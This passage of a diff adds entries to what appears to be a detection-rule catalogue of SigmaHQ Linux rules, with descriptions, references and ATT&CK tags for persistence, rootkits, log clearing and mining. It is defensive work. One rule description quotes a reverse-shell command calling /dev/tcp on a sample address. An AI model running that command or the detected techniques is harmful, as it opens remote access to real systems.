+ "logsource.category": "file_create", + "logsource.product": "linux", + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", + "value": "Linux Doas Conf File Creation" + }, + { + "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Any legitimate cron file." + ], + "filename": "file_create_lnx_persistence_cron_files.yml", + "level": "medium", + "logsource.category": "file_create", + "logsource.product": "linux", + "refs": [ + "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_cron_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", + "value": "Persistence Via Cron Files" + }, + { + "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Creation of legitimate files in sudoers.d folder part of administrator work" + ], + "filename": "file_create_lnx_persistence_sudoers_files.yml", + "level": "medium", + "logsource.category": "file_create", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_sudoers_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", + "value": "Persistence Via Sudoers Files" + }, + { + "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_create_lnx_triple_cross_rootkit_lock_file.yml", + "level": "high", + "logsource.category": "file_create", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_lock_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", + "value": "Triple Cross eBPF Rootkit Default LockFile" + }, + { + "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_create_lnx_triple_cross_rootkit_persistence.yml", + "level": "high", + "logsource.category": "file_create", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1053.003" + ] + }, + "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", + "value": "Triple Cross eBPF Rootkit Default Persistence" + }, + { + "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Vulnerability scanners", + "Frequent attacks if system faces Internet" + ], + "filename": "modsec_mulitple_blocks.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/modsecurity/modsec_mulitple_blocks.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499" + ] + }, + "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", + "value": "Multiple Modsecurity Blocks" + }, + { + "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_lnx_back_connect_shell_dev.yml", + "level": "critical", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" + ], + "tags": "No established tags" + }, + "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", + "value": "Linux Reverse Shell Indicator" + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "net_connection_lnx_crypto_mining_indicators.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" + ], + "tags": "No established tags" + }, + "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", + "value": "Linux Crypto Mining Pool Connections" + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/03", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "filename": "net_connection_lnx_ngrok_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ] + }, + "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", + "value": "Communication To Ngrok Tunneling Service - Linux" + }, + { + "description": "Detects relevant ClamAV messages", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_clamav.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_clamav.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.001" + ] + }, + "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", + "value": "Relevant ClamAV Message" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_security_tools_disabling_syslog.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_security_tools_disabling_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "value": "Disabling Security Tools - Builtin" + }, + { + "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_ssh_cve_2018_15473.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Rhynorater/CVE-2018-15473-Exploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_ssh_cve_2018_15473.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1589" + ] + }, + "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", + "value": "SSHD Error Message CVE-2018-15473" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/16", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Workstations with frequently changing users" + ], + "filename": "lnx_susp_failed_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", + "value": "Failed Logins with Different Accounts from Single Source - Linux" + }, + { + "description": "Detects suspicious session with two users present", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_guacamole.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://research.checkpoint.com/2020/apache-guacamole-rce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_guacamole.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "1edd77db-0669-4fef-9598-165bda82826d", + "value": "Guacamole Two Users Sharing Session Anomaly" + }, + { + "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_named.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_named.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", + "value": "Suspicious Named Error" + }, + { + "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/30", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_ssh.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_ssh.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", + "value": "Suspicious OpenSSH Daemon Error" + }, + { + "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_vsftp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/dagwieers/vsftpd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_vsftp.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", + "value": "Suspicious VSFTPD Error Messages" + }, + { + "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_at_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.002" + ] + }, + "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", + "value": "Scheduled Task/Job At" + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_base64_decode.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", + "value": "Decode Base64 Encoded Text" + }, + { + "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/26", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_base64_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/arget13/DDexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", + "value": "Linux Base64 Encoded Pipe to Shell" + }, + { + "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_base64_shebang_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", + "value": "Linux Base64 Encoded Shebang In CLI" + }, + { + "description": "Detects the usage of the unsafe bpftrace option", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate usage of the unsafe option" + ], + "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", + "https://bpftrace.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", + "value": "BPFtrace Unsafe Option Usage" + }, + { + "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_cat_sudoers.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ] + }, + "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", + "value": "Cat Sudoers" + }, + { + "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." + ], + "filename": "proc_creation_lnx_chattr_immutable_removal.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", + "value": "Remove Immutable File Attribute" + }, + { + "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_clear_logs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", + "value": "Clear Linux Logs" + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", + "meta": { + "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Log rotation." + ], + "filename": "proc_creation_lnx_clear_syslog.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", + "value": "Commands to Clear or Remove the Syslog" + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate usage of xclip tools." + ], + "filename": "proc_creation_lnx_clipboard_collection.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.packetlabs.net/posts/clipboard-data-security/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", + "value": "Clipboard Collection with Xclip Tool" + }, + { + "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_crontab_removal.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", + "value": "Remove Scheduled Cron Task/Job" + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "proc_creation_lnx_crypto_mining.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" + ], + "tags": "No established tags" + }, + "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", + "value": "Linux Crypto Mining Indicators" + }, + { + "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_lnx_curl_usage.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", + "value": "Curl Usage on Linux" + }, + { + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059", + "cve.2022.26134" + ] + }, + "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", + "value": "Atlassian Confluence CVE-2022-26134" + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ] + }, + "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", + "value": "Apache Spark Shell Command Injection - ProcessCreation" + }, + { + "description": "Detects potential overwriting and deletion of a file using DD.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Any user deleting files that way." + ], + "filename": "proc_creation_lnx_dd_file_overwrite.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "2953194b-e33c-4859-b9e8-05948c167447", + "value": "DD File Overwrite" + }, + { + "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", + "meta": { + "author": "Sittikorn S, Teoderick Contreras", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_doas_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_tool_execution/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", + "value": "Linux Doas Tool Execution" + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_file_and_directory_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", + "value": "File and Directory Discovery - Linux" + }, + { + "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_file_deletion.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", + "value": "File Deletion" + }, + { + "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_install_root_certificate.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", + "value": "Install Root Certificate" + }, + { + "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_local_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", + "value": "Local System Accounts Discovery - Linux" + }, + { + "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_local_groups.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": 